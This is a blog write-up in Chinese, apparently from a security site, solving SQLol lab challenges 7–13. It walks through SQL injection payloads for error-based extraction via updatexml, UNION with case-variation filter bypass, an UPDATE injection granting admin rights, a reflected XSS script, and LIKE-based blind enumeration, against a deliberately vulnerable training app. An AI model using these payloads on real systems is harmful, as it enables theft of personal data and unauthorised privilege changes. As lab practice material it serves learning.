SQLol-Challenges writeup(二)

接着上一篇,继续来进行sqlolchallenge~

Challenge 7 – Walking on Thin Ice

Your objective is to find the table of social security numbers present in the database and extract its information WITHOUT deleting anything from the database.
(If you do happen to destroy the database, you can always use the SQLol reset button to bring it back to its original state.)

找寻社保号码,但是不能删除任何东西。

其实后面的几条由于没有回显,导致我们必须进行fuzz

根据题目来说,由于是delete query,因此我们可以大概猜到sql语句为

DELETE FROM users WHERE username = ‘[1]’

[1]处即为我们填写的

answer:’ or updatexml(1,concat(0x7e,select concat(name,ssn) from ssn),0) or’

 

Challenge 8 – Black Comedy

Your objective is to find the table of social security numbers present in the database and extract its information.

这里开始有过滤了,不过过滤等级为low

$blacklist_low = ‘select,from,1=1,–,union,#’;

这是low等级过滤的一些语句,尝试一下大小写绕过。。

初步尝试:1′ And 1=2 Union Select concat(name,ssn)from ssn

这里大小写绕过,都能成功,但是由于过滤了or,在语句结尾不能顺利闭合

Query (injection string is underlined): SELECT username FROM users WHERE username = ‘1′ And 1=2 Union Select concat(name,ssn)from ssn‘ GROUP BY username ORDER BY username ASC

因此这里我们需要想办法来闭合最后的单引号

这里我采用的办法是在最后再构造一个选择语句来闭合最后的单引号

answer:1′ And 1=2 Union Select concat(name,ssn)from ssn Union Select null From users Where username=’

最后显示

Query (injection string is underlined): SELECT username FROM users WHERE username = ‘1′ And 1=2 Union Select concat(name,ssn)from ssn Union Select null From users Where username=’‘ GROUP BY username ORDER BY username ASC
Array ( [username] => Chunk MacRunfast666-67-6776 )
Array ( [username] => Herp Derper012-34-5678 )
Array ( [username] => Peter Weiner111-22-3333 )
Array ( [username] => SlapdeBack LovedeFace999-99-9999 )
Array ( [username] => Wengdack Slobdegoob000-00-1112 )

 

Challenge 9 – Administrative Tasks

Your objective is to inject into the query and cause it to update the “isadmin” field to 1 for the user with id 3.

进入数据库然后将id为3的用户设置为isadmin(初始所有id的人isadmin均为0)

初步尝试了下出现了报错语句
Query (injection string is underlined): UPDATE users SET username = ‘1″‘ WHERE isadmin = 0

answer:’ ,isadmin= 1 where id=3#

最终显示

Query (injection string is underlined): UPDATE users SET username = ‘‘ ,isadmin= 1 where id=3#‘ WHERE isadmin = 0

 

Challenge 10 – No WHERE

Your objective is to obtain the social security numbers from the database.

这里注入的column,因为会显示查询语句,因此这条难度其实不是很大
Query (injection string is underlined): SELECT 123 FROM users WHERE isadmin = 0 GROUP BY username ORDER BY username ASC

直接把后面语句注释掉不就行了。。。。

answer:concat(name,0x7e,ssn) from ssn#

 

Challenge 11 – No WHERE 2

这里跟上题一样,不过注入的位置变了。。

初步尝试了下。。注入语句在最后。。只能报错注入了~
Query (injection string is underlined): SELECT username FROM users WHERE isadmin = 0 GROUP BY username ORDER BY 123 ASC

answer:1 and updatexml(1,(select concat(name,0x7e,ssn) from ssn),0)#

 

Challenge 12 – XSSQLi

Your objective is to use an SQL injection flaw to execute a reflected cross-site scripting attack.

大意就是用sql注入漏洞来执行xss攻击~又是没回显。。。

answer:1′ and <script>alert(1)</script>#

图片[1]-SQLol-Challenges writeup(二)-安全小百科

 

Challenge 13 – LIKE OMG

Your objective is to retrieve all usernames from the database.

根据大意就是等于号都需要换成LIKE,但是过滤了单引号

同时由于是返回的true or false,又是盲注。。。这就稍微演示一下。。

answer:’P%’ LIMIT 0,1

%为通配符,表示任意多个字符

然后修改limit后面语句,不断尝试获得P后面的名字。。

通过不断的尝试,最终获得所有的用户名~

相关推荐: 逆向破解的入门题目

我选取了两条实验吧里的逆向题目,题目不是很难,对于刚刚入门逆向的人来说,我觉得十分有用,由于自身逆向水平有限,有很多地方自己也是一知半解,不多说,开始我的表演~   1.该题不简单 下载压缩包的程度解压后得到一个exe文件,打开运行之 可以看到hel…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论